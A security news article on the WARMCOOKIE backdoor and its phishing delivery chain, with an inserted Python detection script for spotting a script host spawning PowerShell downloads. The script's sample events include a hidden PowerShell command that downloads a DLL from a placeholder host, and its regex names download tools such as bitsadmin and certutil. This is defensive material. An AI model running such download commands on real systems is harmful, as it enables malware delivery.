CyberSecurity SEE

Watch out for WARMCOOKIE Sneaking into Your Inbox

A new Windows backdoor named WARMCOOKIE has been discovered by cybersecurity researchers, deployed through a phishing campaign with a recruiting theme known as REF6127. This backdoor is capable of taking screenshots of the target computer, delivering additional malware payloads, and fingerprinting the system, posing a significant threat to organizations.

According to a statement from Elastic Security Labs to Cyber Security News, this malware provides threat actors with the ability to access targeted environments and deploy various types of malware on victims’ devices. The potential damage that can be caused by WARMCOOKIE is extensive, as it allows threat actors to gather sensitive information from victims’ computers and monitor their activities closely.

The execution flow of WARMCOOKIE involves phishing emails designed to lure recipients into clicking on a link that redirects them to a fake recruitment website. These emails are personalized, mentioning the recipient’s name and current employer to make the message seem more legitimate. Once the victim clicks on the link, they are directed to a landing page where they are asked to complete a CAPTCHA test to download a document. This document contains an obfuscated JavaScript file that, when executed, launches PowerShell and initiates the download and execution of the WARMCOOKIE backdoor.

Researchers have observed that threat actors behind WARMCOOKIE continuously create new landing pages using the IP address 45.9.74[.]135. These landing pages are tailored to target multiple hiring agencies and are optimized with industry-related keywords to attract victims. Before sending its first outgoing network request, the backdoor collects various system information, including the volume serial number, DNS domain of the victim machine, computer name, and username, to fingerprint the target system.
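The infection chain described above (a downloaded JavaScript file launching PowerShell, which then fetches the backdoor) leaves a process-creation footprint that defenders can hunt for. The following is an added example, not code from the article or from Elastic Security Labs: it checks constructed, Sysmon-style process events (field names and the script-host parent names are assumptions) for a Windows script host spawning PowerShell with a download-style command line.

```python
import re

# Constructed sample process-creation events in a Sysmon-like shape.
# Field names, paths and the URL are assumptions for illustration only.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",          # script host ran the JS
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iwr http://example.invalid/doc -OutFile $env:TEMP\\x.dll"'},
    {"parent": r"C:\Windows\explorer.exe",                  # benign admin usage
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
    {"parent": r"C:\Windows\System32\cscript.exe",          # script host, but no shell
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Assumed script hosts that execute a .js file on Windows, and the shells we care about.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Command-line fragments commonly used to pull a payload from the network.
DOWNLOAD_MARKERS = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer|bitsadmin|certutil",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return a reason string if the event matches the JS -> PowerShell -> download chain, else None."""
    parent, image = basename(event["parent"]), basename(event["image"])
    if parent not in SCRIPT_HOSTS or image not in SHELLS:
        return None
    if not DOWNLOAD_MARKERS.search(event["cmdline"]):
        return None
    hidden = " -w hidden" in event["cmdline"].lower() or "-windowstyle hidden" in event["cmdline"].lower()
    return f"{parent} spawned {image} with a download command" + (" (hidden window)" if hidden else "")


def find_suspicious(events):
    """Return (event, reason) pairs for every event that matches the chain."""
    hits = []
    for event in events:
        reason = classify(event)
        if reason:
            hits.append((event, reason))
    return hits


if __name__ == "__main__":
    for event, reason in find_suspicious(SAMPLE_EVENTS):
        print(reason, "->", event["cmdline"])
```

In a real deployment the same logic maps onto a SIEM rule keyed on parent image, image and command line; the markers list is deliberately small and should be tuned against your environment's baseline.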

One of the key functionalities of WARMCOOKIE is its ability to capture screenshots from victims’ computers, enabling threat actors to gather sensitive information and monitor victims’ activities. Analysts also note that threat actors create new infrastructure and domains weekly to support these malicious campaigns. While there may be minor issues in the initial development of the malware, researchers believe that these will be addressed over time as threat actors continue to refine their tactics.

In conclusion, the discovery of the WARMCOOKIE backdoor highlights the evolving nature of cyber threats and the importance of robust cybersecurity measures to mitigate the risk of such attacks. Organizations are advised to remain vigilant against phishing emails and suspicious links, as well as to implement security solutions to detect and prevent the deployment of malware like WARMCOOKIE.